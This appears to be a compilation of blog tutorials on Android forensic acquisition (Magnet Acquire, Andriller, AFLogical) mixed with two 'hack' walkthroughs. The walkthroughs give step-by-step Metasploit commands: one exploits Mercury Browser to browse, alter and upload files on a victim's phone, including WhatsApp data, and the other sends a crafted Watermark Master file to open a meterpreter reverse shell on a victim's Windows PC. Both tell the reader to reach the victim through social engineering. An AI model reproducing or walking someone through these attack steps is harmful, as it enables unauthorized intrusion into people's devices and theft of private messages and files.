How to Create a Forensic Image of Andorid Phone using Magnet Acquire

Magnet ACQUIRETM is designed to quickly and easily acquire an image of any iOS or Android device. Examiners are given the option of two extraction methods: Quick and Full.

First Download Magnet Acquire from here  and Install in your Computer. Now connect your Android phone with Computer using Data Cable. You will get a pop up on your computer screen which says choose your device. Select the device and click Next.

Quick Extraction:
The Quick Extraction method will work on any IOS device, version 5 or newer. Magnet ACQUIRE will combine an iTunes backup, with some additional acquisition techniques, to obtain both native and third-party data.
Full Extraction:
Magnet ACQUIRE can also help you obtain a full, physical image of many Android devices by using either the built-in privilege escalation exploits or by imaging a device that has already been rooted.

Now select your desired option and click next.

Now you will get a pop up first choose the folder destination and put Examiner name and other details and click ACQUIRE.

On your Android Phone you will get a screen says Full Back up, at the bottom right of your phone screen you will see back up my data click on that.

Process will start as shown below.

Process complete as shown in below Image. Click On Exit.

Magnet Acquire has created a raw image of Android phone in the folder your selected.

Forensics Investigation of Android Phone using Andriller

Andriller - is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices. It has other features, such as powerful Lockscreen cracking for Pattern, PIN code, or Password; custom decoders for Apps data from Android (and some Apple iOS) databases for decoding communications. Extraction and decoders produce reports in HTML and Excel (.xlsx) formats.

·         Automated data extraction and decoding
·         Data extraction of non-rooted without devices by Android Backup (Android versions 4.x)
·         Data extraction with root permissions: root ADB daemon, CWM recovery mode, or SU binary (Superuser/SuperSU)
·         Data parsing and decoding for Folder structure, Tarball files (from nanddroid backups), and Android Backup ('backup.ab' files)
·         Selection of individual database decoders for Android and Apple
·         Decryption of encrypted WhatsApp archived databases (msgstore.db.crypt, msgstore.db.crypt5, msgstore.db.crypt7, msgstore.db.crypt8)
·         Lockscreen cracking for Pattern, PIN, Password
·         Unpacking the Android backup files

First Download Andriller from here : and install in your Computer.

Now open the Andriller and select output folder. You will get a pop up and select your desired folder.

Now connect your Android phone with computer using Data cable. IN Andriller software click on Check option, if your Android phone is successfully connected with Andriller it will give a Serial ID.

Once you get Serial ID then select the check box which says Open Report & Use AB method and click on GO.

Your will get a Pop up click ok.

On your Android Phone you will get a screen says Full Back up , at the bottom right of your phone screen you will see Back up my data click on that.

Now Andriller will start taking the Back up of your phone and you can see the logs on Andriller as well.

Once the Backup is complete, you can see the complete data in the folder your selected.

You will see a pop up on your browser which will show you the complete phone report.

You can select any of the option to see the details as shown in the below image. Example select WiFi password, you will get all the details which is saved under this folder.

Same way select another option says Android Download history in this you will see all downloads.

Same way select another option says Android Call logs in this you will see all Call details.

Same way select another option says SMS Snippets in this you will see all Overview.

Hack Android Phone WhatsApp and all Directories using Mercury Browser Vulnerability

This module exploits an unsafe intent URI scheme and directory traversal found in Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a private WIFI manager activity, which starts a web server for Mercury on port 8888. The web server also suffers a directory traversal that allows remote access to sensitive files. By default, this module will go after web view Cookies Chromium.db, web view Cookies Chromium Private.db, webview.db, and bookmarks.db. But if this isn't enough, you can also specify the ADDITIONAL_FILES data store option to collect more files.

Exploit Targets
Android Mercury Browser version 3.2.3

Attacker: kali Linux
Victim Phone: Android

Open Kali terminal type msfconsole

Now type use auxiliary/server/android_mercury_paresuri
msf exploit (android_mercury_paresuri)>set payload android/meterpreter/reverse_tcp
msf exploit (android_mercury_paresuri)>set lhost (IP of Local Host)
msf exploit (android_mercury_paresuri)>set srvhost
msf exploit (android_mercury_paresuri)>set uripath /
msf exploit (android_mercury_paresuri)>exploit

Now an URL you should give to your victim

Go to Google Play Store in your phone and search Mercury Browser for Android and Install it.

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link ( it will show the page like given below.

Now on your phone you will get a Notification States, MERCURY WIFI ON...You will have to turn it ON.

You will see a pop up as shown below on your phone screen.

Now on your computer open browse and type IP- and press Enter. Now you will get access to all directories, files & folders which Victim has in his/her phone.

For Example If you want to access victim WhatsApp data, go to WhatsApp folder and you will see different options like Download, Delete & Upload from here you can make changes to his WhatsApp or you can upload any files. As mentioned below

Another Example, if you want to see what Images are in Camera folder use same way as mention above.

Hack Remote PC using Watermark Master Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when processing a specially crafted .WCF file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Watermark Master to open a malicious .WCF file.

Exploit Targets
Watermark Master 2.2.23

Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/watermark_master
msf exploit (watermark_master)>set payload windows/meterpreter/reverse_tcp
msf exploit (watermark_master)>set lhost (IP of Local Host)
msf exploit (watermark_master)>exploit

After we successfully generate the malicious wcf File, it will stored on your local computer


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost

Now send your msf.wcf files to victim using any social engineering technique. Now when the victim will use Watermark master you will get the meterpreter of victim PC.

Logical Forensics of an Android Device using AFLogical

First need to install SANTOKU tool kit. How to install it read this article given below

Note : You need an Android mobile device with USB debugging on

Now, click bottom left of your conputer screeen select SANTOKU then Device Forensics and click on AF Logical OSE.

Note : make sure your android device is connected to computer via USB.

Enable USB debugging on your device. For Android 3.x and below, go to Settings –> Applications –> Development, then check ‘USB debugging’.

Now you will get a Terminal, In terminal type : aflogical-ose  It will show you the success message on the terminal.

ON your mobile screen you will see couple of options like Call log, MMS etc, select the option which you want to extract and then click on Capture. (I have selected all the options as you can see below ).

Now on your mobile screen you will see the Extracting Data as shown in Image.

In terminal press Enter and now it will save the data and make a new folder in SD card by the name of Forensics .

Here is it will look like(I have selected the forensics folder see below )

Click on Forensics folder here you will see the data you have selected.